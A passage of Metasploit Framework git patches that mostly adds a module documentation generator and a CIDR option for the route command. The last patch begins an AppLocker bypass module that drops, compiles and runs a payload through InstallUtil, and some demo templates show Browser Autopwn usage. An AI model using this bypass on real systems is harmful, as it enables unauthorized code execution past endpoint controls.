+} + +pre .value, +pre .string, +pre .scss .value .string { + color: #d14; +} + +pre .comment { + color: #998; + font-style: italic; +} + +pre .function .title { + color: #900; +} + +pre .class { + color: #458; +} + +pre .id, +pre .pseudo, +pre .constant, +pre .hexcolor { + color: teal; +} + +pre .variable { + color: #336699; +} + +pre .javadoc { + color: #997700; +} + +pre .pi, +pre .doctype { + color: #3344bb; +} + +pre .number { + color: #099; +} + +pre .important { + color: #f00; +} + +pre .label { + color: #970; +} + +pre .preprocessor { + color: #579; +} + +pre .reserved, +pre .keyword, +pre .scss .value { + color: #000; +} + +pre .regexp { + background-color: #fff0ff; + color: #880088; +} + +pre .symbol { + color: #990073; +} + +pre .symbol .string { + color: #a60; +} + +pre .tag { + color: #007700; +} + +pre .at_rule, +pre .at_rule .keyword { + color: #088; +} + +pre .at_rule .preprocessor { + color: #808; +} + +pre .scss .tag, +pre .scss .attribute { + color: #339; +} \ No newline at end of file diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index a05d06080f..451dea0f28 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -16,6 +16,7 @@ require 'msf/ui/console/command_dispatcher/nop' require 'msf/ui/console/command_dispatcher/payload' require 'msf/ui/console/command_dispatcher/auxiliary' require 'msf/ui/console/command_dispatcher/post' +require 'msf/util/document_generator' module Msf module Ui @@ -743,7 +744,9 @@ class Core def cmd_info_help print_line "Usage: info <module name> [mod2 mod3 ...]" print_line - print_line "Optionally the flag '-j' will print the data in json format" + print_line "Options:" + print_line "* The flag '-j' will print the data in json format" + print_line "* The flag '-d' will show the markdown version with a browser" print_line "Queries the supplied module or modules for information. If no module is given," print_line "show info for the currently active module." print_line @@ -754,15 +757,24 @@ class Core # def cmd_info(*args) dump_json = false + show_doc = false + if args.include?('-j') args.delete('-j') dump_json = true end + if args.include?('-d') + args.delete('-d') + show_doc = true + end + if (args.length == 0) if (active_module) if dump_json print(Serializer::Json.dump_module(active_module) + "\n") + elsif show_doc + Msf::Util::DocumentGenerator.get_module_document(active_module) else print(Serializer::ReadableText.dump_module(active_module)) end @@ -783,6 +795,8 @@ class Core print_error("Invalid module: #{name}") elsif dump_json print(Serializer::Json.dump_module(mod) + "\n") + elsif show_doc + Msf::Util::DocumentGenerator.get_module_document(mod) else print(Serializer::ReadableText.dump_module(mod)) end diff --git a/lib/msf/util/document_generator.rb b/lib/msf/util/document_generator.rb new file mode 100644 index 0000000000..a4b53b4fc8 --- /dev/null +++ b/lib/msf/util/document_generator.rb @@ -0,0 +1,285 @@ +### +# +# This provides methods to generate documentation for a module. +# +### + +require 'octokit' +require 'nokogiri' +require 'redcarpet' +require 'net/http' +require 'erb' + +module Redcarpet + module Render + class MsfMdHTML < Redcarpet::Render::HTML + def block_code(code, language) + "<pre>" \ + "<code>#{code}</code>" \ + "</pre>" + end + end + end +end + + +module Msf + module Util + module DocumentGenerator + + class HTMLwithPygments < Redcarpet::Render::HTML + def block_code(code, language) + "Nope" + end + end + + class DocumentNormalizer + + CSS_BASE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown.css' )) + + def get_md_content(items) + md_to_html(ERB.new(%Q|## #{items[:mod_name]} + + #{normalize_description(items[:mod_description])} + + ## Module Name + + #{items[:mod_fullname]} + + ## Authors + + #{normalize_authors(items[:mod_authors])} + + <% unless items[:mod_pull_requests].empty? %> + ## Related Pull Requests + + #{normalize_pull_requests(items[:mod_pull_requests])} + <% end %> + + <% unless items[:mod_refs].empty? %> + ## References + + #{normalize_references(items[:mod_refs])} + <% end %> + + ## Platforms + #{normalize_platforms(items[:mod_platforms])} + + ## Reliability + #{normalize_rank(items[:mod_rank])} + + ## Demo + + #{normalize_demo_output(items[:mod_demo])} + |).result(binding())) + end + + private + + def md_to_html(md) + md.gsub!(/\x20{12}/, '') + r = Redcarpet::Markdown.new(Redcarpet::Render::MsfMdHTML, fenced_code_blocks: true) + css_path = + %Q| + <html> + <head> + <link rel="stylesheet" href="file://#{CSS_BASE_PATH}"> + </head> + <body> + #{r.render(md)} + </body> + </html> + | + end + + def normalize_pull_requests(pull_requests) + formatted_pr = [] + + pull_requests.each_pair do |number, pr| + formatted_pr << "* <a href=\"https://github.com/rapid7/metasploit-framework/pull/#{number}\">##{number}</a> - #{pr[:title]}" + end + + formatted_pr * "\n" + end + + def normalize_description(description) + Rex::Text.wordwrap(Rex::Text.compress(description)) + end + + def normalize_authors(authors) + if authors.kind_of?(Array) + authors.collect { |a| "* #{a}" } * "\n" + else + authors + end + end + + def normalize_targets(targets) + targets.collect { |c| "* #{c.name}" } * "\n" + end + + def normalize_references(refs) + refs.collect { |r| "* <a href=\"#{r}\">#{r}</a>" } * "\n" + end + + def normalize_platforms(platforms) + if platforms.kind_of?(Array) + platforms.collect { |p| "* #{p}" } * "\n" + else + platforms + end + end + + def normalize_rank(rank) + "[#{Msf::RankingName[rank].capitalize}](https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking)" + end + + def normalize_demo_output(mod) + %Q|``` + msf > use #{mod.fullname} + msf #{mod.type}(#{mod.shortname}) > show targets + ... a list of targets ... + msf #{mod.type}(#{mod.shortname}) > set TARGET <target-id> + msf #{mod.type}(#{mod.shortname}) > show options + ... show and set options ... + msf #{mod.type}(#{mod.shortname}) > run + ```| + end + + end + + class PullRequestFinder + class Exception < RuntimeError; end + + MANUAL_BASE_PATH = File.expand_path(File.join(Msf::Config.module_directory, '..', 'documentation', 'modules' )) + + attr_accessor :git_client + attr_accessor :repository + attr_accessor :branch + attr_accessor :owner + attr_accessor :git_access_token + + def initialize + unless ENV.has_key?('GITHUB_OAUTH_TOKEN') + raise PullRequestFinder::Exception, 'GITHUB_OAUTH_TOKEN environment variable not set.' + end + + self.owner = 'rapid7' + self.repository = "#{owner}/metasploit-framework" + self.branch = 'master' + self.git_access_token = ENV['GITHUB_OAUTH_TOKEN'] + self.git_client = Octokit::Client.new(access_token: git_access_token) + end + + def search(mod) + file_name = get_normalized_module_name(mod) + commits = get_commits_from_file(file_name) + get_pull_requests_from_commits(commits) + end + + private + + def get_normalized_module_name(mod) + source_fname = mod.method(:initialize).source_location.first + source_fname.scan(/(modules.+)/).flatten.first || '' + end + + def get_commits_from_file(path) + commits = git_client.commits(repository, branch, path: path) + if commits.empty? + # Possibly the path is wrong. + raise PullRequestFinder::Exception, 'No commits found.' + end + + commits + end + + def get_author(commit) + if commit.author + return commit.author[:login].to_s + end + + '' + end + + def is_author_blacklisted?(commit) + ['tabassassin'].include?(get_author(commit)) + end + + def get_pull_requests_from_commits(commits) + pull_requests = {} + + commits.each do |commit| + next if is_author_blacklisted?(commit) + + pr = get_pull_request_from_commit(commit) + unless pr.empty? + pull_requests[pr[:number]] = pr + end + end + + pull_requests + end + + def get_pull_request_from_commit(commit) + sha = commit.sha + url = URI.parse("https://github.com/#{repository}/branch_commits/#{sha}") + cli = Net::HTTP.new(url.host, url.port) + cli.use_ssl = true + req = Net::HTTP::Get.new(url.request_uri) + res = cli.request(req) + n = Nokogiri::HTML(res.body) + found_pr_link = n.at('li[@class="pull-request"]//a') + + # If there is no PR associated with this commit, it's probably from the SVN days. + return {} unless found_pr_link + + href = found_pr_link.attributes['href'].text + title = found_pr_link.attributes['title'].text + + # Filter out all the pull requests that do not belong to rapid7. + # If this happens, it's probably because the PR was submitted to somebody's fork. + return {} unless /^\/#{owner}\// === href + + { number: href.scan(/\d+$/).flatten.first, title: title } + end + + end + + def self.get_module_document(mod) + manual_path = File.join(PullRequestFinder::MANUAL_BASE_PATH, mod.fullname) + + if File.exists?(manual_path) + Rex::Compat.open_webrtc_browser("file://#{manual_path}") + else + pr_finder = PullRequestFinder.new + pr = pr_finder.search(mod) + n = DocumentNormalizer.new + items = { + mod_description: mod.description, + mod_authors: mod.send(:module_info)['Author'], + mod_fullname: mod.fullname, + mod_name: mod.name, + mod_pull_requests: pr, + mod_refs: mod.references, + mod_rank: mod.rank, + mod_platforms: mod.send(:module_info)['Platform'], + mod_options: mod.datastore, + mod_demo: mod + } + + if mod.respond_to?(:targets) && mod.targets + items[:mod_targets] = mod.targets + end + + md = n.get_md_content(items) + f = Rex::Quickfile.new(["#{mod.shortname}_doc", '.html']) + f.write(md) + f.close + Rex::Compat.open_webrtc_browser("file://#{f.path}") + end + end + + end + end +end From 509a1e8de176bc82a4b125881211e9da944b840c Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Tue, 16 Feb 2016 23:18:29 -0600 Subject: [PATCH 337/686] Add manual for demo purposes --- .../exploit/windows/browser/ms14_064_ole_code_execution.md | 1 + lib/msf/util/document_generator.rb | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) create mode 100644 documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md diff --git a/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md b/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md new file mode 100644 index 0000000000..70a58ea7ff --- /dev/null +++ b/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md @@ -0,0 +1 @@ +# KEEP CALM AND EAT A COOKIE \ No newline at end of file diff --git a/lib/msf/util/document_generator.rb b/lib/msf/util/document_generator.rb index a4b53b4fc8..2b5af7f122 100644 --- a/lib/msf/util/document_generator.rb +++ b/lib/msf/util/document_generator.rb @@ -247,7 +247,7 @@ module Msf end def self.get_module_document(mod) - manual_path = File.join(PullRequestFinder::MANUAL_BASE_PATH, mod.fullname) + manual_path = File.join(PullRequestFinder::MANUAL_BASE_PATH, "#{mod.fullname}.md") if File.exists?(manual_path) Rex::Compat.open_webrtc_browser("file://#{manual_path}") From 08dff6541d3cdb98c6366887ae28ee8b9558d32c Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Tue, 16 Feb 2016 23:29:08 -0600 Subject: [PATCH 338/686] rm junk code --- lib/msf/util/document_generator.rb | 6 ------ 1 file changed, 6 deletions(-) diff --git a/lib/msf/util/document_generator.rb b/lib/msf/util/document_generator.rb index 2b5af7f122..dec8dd0cd4 100644 --- a/lib/msf/util/document_generator.rb +++ b/lib/msf/util/document_generator.rb @@ -27,12 +27,6 @@ module Msf module Util module DocumentGenerator - class HTMLwithPygments < Redcarpet::Render::HTML - def block_code(code, language) - "Nope" - end - end - class DocumentNormalizer CSS_BASE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown.css' )) From 28e6d8ef9e99b6879d1d19c4b75ac36cbc4f7166 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Wed, 17 Feb 2016 09:44:32 -0600 Subject: [PATCH 339/686] Allow CIDR notation for the route command --- lib/msf/ui/console/command_dispatcher/core.rb | 34 +++++++++---------- 1 file changed, 16 insertions(+), 18 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index a6165c2bbb..cf11b92dd7 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -1310,24 +1310,22 @@ class Core case action when "add", "remove", "del" - if (args.length < 3) + subnet = args.shift + subnet,cidr_mask = subnet.split("/") + + if cidr_mask + netmask = Rex::Socket.addr_ctoa(cidr_mask.to_i) + else + netmask = args.shift + end + + gateway_name = args.shift + + if (subnet.nil? || netmask.nil? || gateway_name.nil?) print_error("Missing arguments to route #{action}.") return false end - # Satisfy check to see that formatting is correct - unless Rex::Socket::RangeWalker.new(args[0]).length == 1 - print_error "Invalid IP Address" - return false - end - - unless Rex::Socket::RangeWalker.new(args[1]).length == 1 - print_error "Invalid Subnet mask" - return false - end - - gateway_name = args.pop - gateway = nil case gateway_name @@ -1351,11 +1349,11 @@ class Core msg = "Route " if action == "remove" or action == "del" - worked = Rex::Socket::SwitchBoard.remove_route(args[0], args[1], gateway) - msg << worked ? "removed" : "not found" + worked = Rex::Socket::SwitchBoard.remove_route(subnet, netmask, gateway) + msg << (worked ? "removed" : "not found") else - worked = Rex::Socket::SwitchBoard.add_route(args[0], args[1], gateway) - msg << worked ? "added" : "already exists" + worked = Rex::Socket::SwitchBoard.add_route(subnet, netmask, gateway) + msg << (worked ? "added" : "already exists") end print_status(msg) From 5339bb50d82520e5014aaabf9e22dd79c7371935 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 17 Feb 2016 13:48:24 -0600 Subject: [PATCH 340/686] Support targets --- lib/msf/util/document_generator.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/lib/msf/util/document_generator.rb b/lib/msf/util/document_generator.rb index dec8dd0cd4..7935c5eef8 100644 --- a/lib/msf/util/document_generator.rb +++ b/lib/msf/util/document_generator.rb @@ -56,6 +56,11 @@ module Msf #{normalize_references(items[:mod_refs])} <% end %> + ## Available Targets + <% if items[:mod_targets] %> + #{normalize_targets(items[:mod_targets])} + <% end %> + ## Platforms #{normalize_platforms(items[:mod_platforms])} From d5c005d9488128f699c8bba1877479e2601fa24d Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 17 Feb 2016 13:56:03 -0600 Subject: [PATCH 341/686] HTML-escape some fields --- lib/msf/util/document_generator.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/msf/util/document_generator.rb b/lib/msf/util/document_generator.rb index 7935c5eef8..7f728bdac8 100644 --- a/lib/msf/util/document_generator.rb +++ b/lib/msf/util/document_generator.rb @@ -38,7 +38,7 @@ module Msf ## Module Name - #{items[:mod_fullname]} + #{Rex::Text.html_encode(items[:mod_fullname])} ## Authors @@ -107,9 +107,9 @@ module Msf def normalize_authors(authors) if authors.kind_of?(Array) - authors.collect { |a| "* #{a}" } * "\n" + authors.collect { |a| "* #{Rex::Text.html_encode(a)}" } * "\n" else - authors + Rex::Text.html_encode(authors) end end From 714106174e8554fcc7a0711144b962a5e4aa6f23 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 17 Feb 2016 14:27:29 -0600 Subject: [PATCH 342/686] Do external erb template --- data/markdown_doc/default_template.erb | 43 ++++++++++++++++++ data/{ => markdown_doc}/markdown.css | 0 lib/msf/util/document_generator.rb | 62 +++++++++----------------- 3 files changed, 64 insertions(+), 41 deletions(-) create mode 100644 data/markdown_doc/default_template.erb rename data/{ => markdown_doc}/markdown.css (100%) diff --git a/data/markdown_doc/default_template.erb b/data/markdown_doc/default_template.erb new file mode 100644 index 0000000000..b5ab9a8977 --- /dev/null +++ b/data/markdown_doc/default_template.erb @@ -0,0 +1,43 @@ +## <%= items[:mod_name] %> + +<%= normalize_description(items[:mod_description]) %> + +## Module Name + +<%= Rex::Text.html_encode(items[:mod_fullname]) %> + +## Authors + +<%= normalize_authors(items[:mod_authors]) %> + +<% unless items[:mod_pull_requests].empty? %> +## Related Pull Requests + +<%= normalize_pull_requests(items[:mod_pull_requests]) %> +<% end %> + +<% unless items[:mod_refs].empty? %> +## References + +<%= normalize_references(items[:mod_refs]) %> +<% end %> + +## Available Targets +<% if items[:mod_targets] %> +<%= normalize_targets(items[:mod_targets]) %> +<% end %> + +## Platforms +<%= normalize_platforms(items[:mod_platforms]) %> + +## Reliability +<%= normalize_rank(items[:mod_rank]) %> + +## Mandatory Options +<% unless items[:mod_options].empty? %> +<%= normalize_options(items[:mod_options]) %> +<% end %> + +## Demo + +<%= normalize_demo_output(items[:mod_demo]) %> \ No newline at end of file diff --git a/data/markdown.css b/data/markdown_doc/markdown.css similarity index 100% rename from data/markdown.css rename to data/markdown_doc/markdown.css diff --git a/lib/msf/util/document_generator.rb b/lib/msf/util/document_generator.rb index 7f728bdac8..9992701e64 100644 --- a/lib/msf/util/document_generator.rb +++ b/lib/msf/util/document_generator.rb @@ -29,48 +29,16 @@ module Msf class DocumentNormalizer - CSS_BASE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown.css' )) + CSS_BASE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc','markdown.css' )) + TEMPLATE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc','default_template.erb' )) def get_md_content(items) - md_to_html(ERB.new(%Q|## #{items[:mod_name]} - - #{normalize_description(items[:mod_description])} - - ## Module Name - - #{Rex::Text.html_encode(items[:mod_fullname])} - - ## Authors - - #{normalize_authors(items[:mod_authors])} - - <% unless items[:mod_pull_requests].empty? %> - ## Related Pull Requests - - #{normalize_pull_requests(items[:mod_pull_requests])} - <% end %> - - <% unless items[:mod_refs].empty? %> - ## References - - #{normalize_references(items[:mod_refs])} - <% end %> - - ## Available Targets - <% if items[:mod_targets] %> - #{normalize_targets(items[:mod_targets])} - <% end %> - - ## Platforms - #{normalize_platforms(items[:mod_platforms])} - - ## Reliability - #{normalize_rank(items[:mod_rank])} - - ## Demo - - #{normalize_demo_output(items[:mod_demo])} - |).result(binding())) + @md_template ||= lambda { + template = '' + File.open(TEMPLATE_PATH, 'rb') { |f| template = f.read } + return template + }.call + md_to_html(ERB.new(@md_template).result(binding())) end private @@ -101,6 +69,18 @@ module Msf formatted_pr * "\n" end + def normalize_options(mod_options) + required_options = [] + + mod_options.each_pair do |name, props| + if props.required && props.default.nil? + required_options << "* #{name} - #{props.desc}" + end + end + + required_options * "\n" + end + def normalize_description(description) Rex::Text.wordwrap(Rex::Text.compress(description)) end @@ -263,7 +243,7 @@ module Msf mod_refs: mod.references, mod_rank: mod.rank, mod_platforms: mod.send(:module_info)['Platform'], - mod_options: mod.datastore, + mod_options: mod.options, mod_demo: mod } From 8b267efa2df00258242ae5674bb23ab97d3f5ac6 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 17 Feb 2016 14:29:33 -0600 Subject: [PATCH 343/686] No need to gsub the first 12 spaces anymore --- lib/msf/util/document_generator.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/lib/msf/util/document_generator.rb b/lib/msf/util/document_generator.rb index 9992701e64..bf22a11f15 100644 --- a/lib/msf/util/document_generator.rb +++ b/lib/msf/util/document_generator.rb @@ -44,7 +44,6 @@ module Msf private def md_to_html(md) - md.gsub!(/\x20{12}/, '') r = Redcarpet::Markdown.new(Redcarpet::Render::MsfMdHTML, fenced_code_blocks: true) css_path = %Q| From 0b095cf08a11b8c6d676603377cf7edbd1d39fb7 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 17 Feb 2016 15:25:31 -0600 Subject: [PATCH 344/686] Remove unwanted variable --- lib/msf/util/document_generator.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/lib/msf/util/document_generator.rb b/lib/msf/util/document_generator.rb index bf22a11f15..ea171dcd9c 100644 --- a/lib/msf/util/document_generator.rb +++ b/lib/msf/util/document_generator.rb @@ -44,8 +44,7 @@ module Msf private def md_to_html(md) - r = Redcarpet::Markdown.new(Redcarpet::Render::MsfMdHTML, fenced_code_blocks: true) - css_path = + r = Redcarpet::Markdown.new(Redcarpet::Render::MsfMdHTML, fenced_code_blocks: true) %Q| <html> <head> From 76f2c917ee33fa077b473898dea113e9010b3bc3 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 17 Feb 2016 15:38:30 -0600 Subject: [PATCH 345/686] Allow no GITHUB_OAUTH_TOKEN, and gsub for demo --- data/markdown_doc/default_template.erb | 2 -- lib/msf/util/document_generator.rb | 17 ++++++++++++++--- 2 files changed, 14 insertions(+), 5 deletions(-) diff --git a/data/markdown_doc/default_template.erb b/data/markdown_doc/default_template.erb index b5ab9a8977..a27b2d7e95 100644 --- a/data/markdown_doc/default_template.erb +++ b/data/markdown_doc/default_template.erb @@ -10,11 +10,9 @@ <%= normalize_authors(items[:mod_authors]) %> -<% unless items[:mod_pull_requests].empty? %> ## Related Pull Requests <%= normalize_pull_requests(items[:mod_pull_requests]) %> -<% end %> <% unless items[:mod_refs].empty? %> ## References diff --git a/lib/msf/util/document_generator.rb b/lib/msf/util/document_generator.rb index ea171dcd9c..8908f24740 100644 --- a/lib/msf/util/document_generator.rb +++ b/lib/msf/util/document_generator.rb @@ -58,6 +58,11 @@ module Msf end def normalize_pull_requests(pull_requests) + if pull_requests.kind_of?(PullRequestFinder::Exception) + error = Rex::Text.html_encode(pull_requests.message) + return error + end + formatted_pr = [] pull_requests.each_pair do |number, pr| @@ -120,7 +125,7 @@ module Msf msf #{mod.type}(#{mod.shortname}) > show options ... show and set options ... msf #{mod.type}(#{mod.shortname}) > run - ```| + ```|.gsub(/\x20{12}/, '') end end @@ -229,8 +234,14 @@ module Msf if File.exists?(manual_path) Rex::Compat.open_webrtc_browser("file://#{manual_path}") else - pr_finder = PullRequestFinder.new - pr = pr_finder.search(mod) + begin + pr_finder = PullRequestFinder.new + pr = pr_finder.search(mod) + rescue PullRequestFinder::Exception => e + # This is a little weird, I guess, because the normalizer must handle two different + # data types. + pr = e + end n = DocumentNormalizer.new items = { mod_description: mod.description, From 1bfe1ad14054ed6950d81049cc25fe4c1cd58a79 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 17 Feb 2016 19:04:06 -0600 Subject: [PATCH 346/686] More demos --- data/markdown_doc/bes_demo_template.erb | 15 ++++++++++ data/markdown_doc/default_template.erb | 2 +- data/markdown_doc/generic_demo_template.erb | 9 ++++++ .../markdown_doc/httpserver_demo_template.erb | 4 +++ lib/msf/util/document_generator.rb | 29 ++++++++++++------- 5 files changed, 47 insertions(+), 12 deletions(-) create mode 100644 data/markdown_doc/bes_demo_template.erb create mode 100644 data/markdown_doc/generic_demo_template.erb create mode 100644 data/markdown_doc/httpserver_demo_template.erb diff --git a/data/markdown_doc/bes_demo_template.erb b/data/markdown_doc/bes_demo_template.erb new file mode 100644 index 0000000000..21c130dae2 --- /dev/null +++ b/data/markdown_doc/bes_demo_template.erb @@ -0,0 +1,15 @@ +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > run +``` + +This module is also supported by Browser Autopwn 2. + +To load it from Browser Autopwn 2, here's how: + +``` +msf > use auxiliary/server/browser_autopwn2 +msf auxiliary(browser_autopwn2) > set INCLUDE_PATTERN <%= mod.shortname %> +INCLUDE_PATTERN => <%= mod.shortname %> +msf auxiliary(browser_autopwn2) > exploit +``` \ No newline at end of file diff --git a/data/markdown_doc/default_template.erb b/data/markdown_doc/default_template.erb index a27b2d7e95..48c4b11be9 100644 --- a/data/markdown_doc/default_template.erb +++ b/data/markdown_doc/default_template.erb @@ -31,8 +31,8 @@ ## Reliability <%= normalize_rank(items[:mod_rank]) %> +<% unless normalize_options(items[:mod_options]).empty? %> ## Mandatory Options -<% unless items[:mod_options].empty? %> <%= normalize_options(items[:mod_options]) %> <% end %> diff --git a/data/markdown_doc/generic_demo_template.erb b/data/markdown_doc/generic_demo_template.erb new file mode 100644 index 0000000000..fec7ccf244 --- /dev/null +++ b/data/markdown_doc/generic_demo_template.erb @@ -0,0 +1,9 @@ +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > show targets + ... a list of targets ... +msf <%= mod.type %>(<%= mod.shortname %>) > set TARGET target-id +msf <%= mod.type %>(<%= mod.shortname %>) > show options + ... show and set options ... +msf <%= mod.type %>(<%= mod.shortname %>) > exploit +``` \ No newline at end of file diff --git a/data/markdown_doc/httpserver_demo_template.erb b/data/markdown_doc/httpserver_demo_template.erb new file mode 100644 index 0000000000..3d5737a95d --- /dev/null +++ b/data/markdown_doc/httpserver_demo_template.erb @@ -0,0 +1,4 @@ +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > exploit +``` \ No newline at end of file diff --git a/lib/msf/util/document_generator.rb b/lib/msf/util/document_generator.rb index 8908f24740..b56e69c933 100644 --- a/lib/msf/util/document_generator.rb +++ b/lib/msf/util/document_generator.rb @@ -29,8 +29,11 @@ module Msf class DocumentNormalizer - CSS_BASE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc','markdown.css' )) - TEMPLATE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc','default_template.erb' )) + CSS_BASE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'markdown.css')) + TEMPLATE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'default_template.erb')) + BES_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'bes_demo_template.erb')) + HTTPSERVER_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'httpserver_demo_template.erb')) + GENERIC_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'generic_demo_template.erb')) def get_md_content(items) @md_template ||= lambda { @@ -116,16 +119,20 @@ module Msf "[#{Msf::RankingName[rank].capitalize}](https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking)" end + def load_template(mod, path) + data = '' + File.open(path, 'rb') { |f| data = f.read } + ERB.new(data).result(binding()) + end + def normalize_demo_output(mod) - %Q|``` - msf > use #{mod.fullname} - msf #{mod.type}(#{mod.shortname}) > show targets - ... a list of targets ... - msf #{mod.type}(#{mod.shortname}) > set TARGET <target-id> - msf #{mod.type}(#{mod.shortname}) > show options - ... show and set options ... - msf #{mod.type}(#{mod.shortname}) > run - ```|.gsub(/\x20{12}/, '') + if mod.kind_of?(Msf::Exploit::Remote::BrowserExploitServer) + load_template(mod, BES_DEMO_TEMPLATE) + elsif mod.kind_of?(Msf::Exploit::Remote::HttpServer) + load_template(mod, HTTPSERVER_DEMO_TEMPLATE) + else + load_template(mod, GENERIC_DEMO_TEMPLATE) + end end end From 2f4ec0af311a02c786eb1d189e0511d4d43f3658 Mon Sep 17 00:00:00 2001 From: OJ <oj@buffered.io> Date: Thu, 18 Feb 2016 13:33:43 +1000 Subject: [PATCH 347/686] Add module for AppLocker bypass This commit includes a new module that allows for payloads to be uploaded and executed from disk while bypassing AppLocker in the process. This module is useful for when you're attempting to generate new shells on the target once you've already got a session. It is also a handy way of switching between 32 and 64 bit sessions (in the case of the InstallUtil technique). The code is taken from Casey Smith's AppLocker bypass research (added in the references), and includes just one technique at this point. This technique uses the InstallUtil feature that comes with .NET. Other techiques can be added at any time. The code creates a C# file and uploads it to the target. The csc.exe compiler is used to create a .NET assembly that contains an uninstaller that gets invoked by InstallUtil behind the scenes. This function is what contains the payload. This was tested on Windows 7 x64. It supports running of both 32 and 64 bit payloads out of the box, and checks to make sure that .NET is installed on the target as well as having a payload that is valid for the machine (ie. don't run x64 on x86 OSes). This appears to work fine with both staged and stageless payloads. --- .../windows/local/applocker_bypass.rb | 146 ++++++++++++++++++ 1 file changed, 146 insertions(+) create mode 100644 modules/exploits/windows/local/applocker_bypass.rb diff --git a/modules/exploits/windows/local/applocker_bypass.rb b/modules/exploits/windows/local/applocker_bypass.rb new file mode 100644 index 0000000000..64adca97e0 --- /dev/null +++ b/modules/exploits/windows/local/applocker_bypass.rb @@ -0,0 +1,146 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rex' +require 'msf/core/exploit/exe' + +class Metasploit4 < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::FileDropper + include Msf::Post::File + + def initialize(info={}) + super(update_info(info, + 'Name' => 'AppLocker bypass', + 'Description' => %q{ + This module will generate a .NET service executable on the target and utilise + InstallUtil to run the payload bypassing the AppLocker protection. + + Currently only the InstallUtil method is provided, but future methods can be + added easily. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Casey Smith', # Original AppLocker bypass research + 'OJ Reeves' # MSF module + ], + 'Platform' => [ 'win' ], + 'Arch' => [ ARCH_X86, ARCH_X86_64 ], + 'SessionTypes' => [ 'meterpreter' ], + 'Targets' => [ [ 'Windows', {} ] ], + 'DefaultTarget' => 0, + 'DisclosureDate'=> 'Aug 3 2015', + 'References' => + [ + ['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57'] + ] + )) + + register_options([ + OptEnum.new('TECHNIQUE', [true, 'Technique to use to bypass AppLocker', + 'INSTALLUTIL', %w(INSTALLUTIL)])]) + end + + # Run Method for when run command is issued + def exploit + if datastore['TECHNIQUE'] == 'INSTALLUTIL' + if payload.arch.first == 'x64' and !(sysinfo['Architecture'] =~ /64/) + fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.') + end + end + + # syinfo is only on meterpreter sessions + print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? + + if datastore['TECHNIQUE'] == 'INSTALLUTIL' + execute_installutil + end + end + + def execute_installutil + envs = get_envs('TEMP', 'windir') + + dotnet_path = get_dotnet_path(envs['windir']) + print_status("Using .NET path #{dotnet_path}") + + cs_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.cs" + exe_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.exe" + + installutil_path = "#{dotnet_path}\\InstallUtil.exe" + + print_status("Writing payload to #{cs_path}") + write_file(cs_path, generate_csharp_source) + register_files_for_cleanup(cs_path) + + print_status("Compiling payload to #{exe_path}") + csc_path = "#{dotnet_path}\\csc.exe" + csc_platform = payload.arch.first == 'x86' ? 'x86' : 'x64' + vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}") + cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 